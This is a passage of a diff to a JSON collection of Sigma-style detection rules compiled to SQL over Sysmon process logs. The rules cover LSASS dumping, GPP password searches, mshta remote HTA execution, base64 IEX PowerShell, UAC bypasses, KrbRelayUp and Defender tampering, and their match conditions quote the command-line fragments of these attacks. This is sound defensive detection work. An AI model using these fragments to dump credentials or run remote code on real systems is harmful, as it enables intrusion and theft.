"proc_creation_win_renamed_adfind.yml" + "filename": "proc_creation_win_malware_emotet.yml" }, { - "title": "Findstr GPP Passwords", - "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "title": "LSASS Memory Dumping", + "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "status": "test", - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", - "author": "frack113", + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ "attack.credential_access", - "attack.t1552.006" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\werfault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml" + "filename": "proc_creation_win_susp_lsass_dump.yml" }, { - "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", - "id": "b98d0db6-511d-45de-ad02-e82a98729620", + "title": "Python Spawning Pretty TTY on Windows", + "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "status": "experimental", - "description": "Detects execution of the \"mshta\" utility with an argument 
containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects python spawning a pretty tty", + "author": "Nextron Systems", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.005" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_http.yml" + "filename": "proc_creation_win_python_pty_spawn.yml" }, { - "title": "Command Line Path Traversal Evasion", - "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", - "status": "experimental", - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "author": "Christian Burkard (Nextron Systems)", + "title": "Potential LethalHTA Technique Execution", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "test", + "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", + "author": "Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1218.005" ], "falsepositives": [ - "Google Drive", - "Citrix" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" + "filename": "proc_creation_win_mshta_lethalhta_technique.yml" }, { - "title": "Potential Data Stealing Via Chromium Headless Debugging", - "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", - "status": "experimental", - "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. 
This could be a sign of data stealing or remote control", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PUA - Radmin Viewer Utility Execution", + "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "status": "test", + "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" + "filename": "proc_creation_win_pua_radmin.yml" }, { - "title": "Suspicious MSDT Parent Process", - "id": "7a74da6b-ea76-47db-92cc-874ad90df734", - "status": "experimental", - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "author": "Nextron Systems", + "title": "HackTool - F-Secure C3 Load by Rundll32", + "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "status": "test", + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "author": "Alfie Champion (ajpc500)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE 
'%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msdt_susp_parent.yml" + "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" }, { - "title": "Suspicious PowerShell IEX Execution Patterns", - "id": "09576804-7a05-458e-a817-eb718ca91f54", + "title": "HackTool - KrbRelayUp Execution", + "id": "12827a56-61a4-476a-a9cb-f3068f191073", "status": "experimental", - "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ], "falsepositives": [ - "Legitimate scripts that use IEX" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE 
'\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_iex_patterns.yml" + "filename": "proc_creation_win_hktl_krbrelayup.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", - "id": "55f0a3a1-846e-40eb-8273-677371b8d912", + "title": "File Download with Headless Browser", + "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", "status": "test", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. 
This can be used by threat actors to download files.", + "author": "Sreeman, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" }, { - "title": "Suspicious Registry Modification From ADS Via Regini.EXE", - "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "title": "Tamper Windows Defender Remove-MpPreference", + "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", "status": "experimental", - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ 
\\\\]')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regini_ads.yml" + "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" }, { - "title": "UAC Bypass Using DismHost", - "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "title": "UAC Bypass WSReset", + "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "status": "test", - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", 
@@ -9499,798 +9243,736 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml" + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" }, { - "title": "Potential PowerShell Obfuscation Via Reversed Commands", - "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", - "status": "test", - "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "title": "PUA - Process Hacker / System Informer Execution", + "id": "811e0002-b13b-4a15-9d00-a613fce66e42", + "status": "experimental", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Sometimes used by developers or system administrators for debugging purposes" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (Image LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product 
= 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + ], + "filename": "proc_creation_win_pua_process_hacker.yml" + }, + { + "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", + "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "status": "experimental", + "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine 
LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" + "filename": "proc_creation_win_net_use_mount_internet_share.yml" }, { - "title": "UNC2452 PowerShell Pattern", - "id": "b7155193-8a81-4d8f-805d-88de864ca50c", - "status": "test", - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", - "author": "Florian Roth (Nextron Systems)", + "title": 
"Suspicious Schtasks Schedule Types", + "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "status": "experimental", + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.t1047" + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Legitimate processes that run at logon. Filter according to your environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Invoke-WMIMethod win32\\_process -name create -argumentlist%' ESCAPE '\\' AND CommandLine LIKE '%rundll32 c:\\\\windows%' ESCAPE '\\') OR (CommandLine LIKE '%wmic /node:%' ESCAPE '\\' AND CommandLine LIKE '%process call create \"rundll32 c:\\\\windows%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_unc2452_ps.yml" + "filename": "proc_creation_win_schtasks_schedule_type.yml" }, { - "title": "Schtasks From Suspicious Folders", - "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", + "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", + "id": "5b768e71-86f2-4879-b448-81061cbae951", "status": "experimental", - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious 
manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% 
DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_folder_combos.yml" + "filename": "proc_creation_win_net_default_accounts_manipulation.yml" }, { - "title": "Potential EmpireMonkey Activity", - "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "title": "Potential Recon Activity Via Nltest.EXE", + "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "status": "experimental", - "description": "Detects potential EmpireMonkey APT activity", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Craig Young, oscd.community, Georg Lauenstein", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.discovery", + "attack.t1016", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Legitimate administration use but user and host must be 
investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%/e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Local\\\\Temp\\\\Errors.bat%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_empiremonkey.yml" + "filename": "proc_creation_win_nltest_recon.yml" }, { - "title": "Potential MuddyWater APT Activity", - "id": "36222790-0d43-4fe8-86e4-674b27809543", + "title": "UAC Bypass Using ChangePK and SLUI", + "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "status": "test", - "description": "Detects potential Muddywater APT activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.g0069" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE 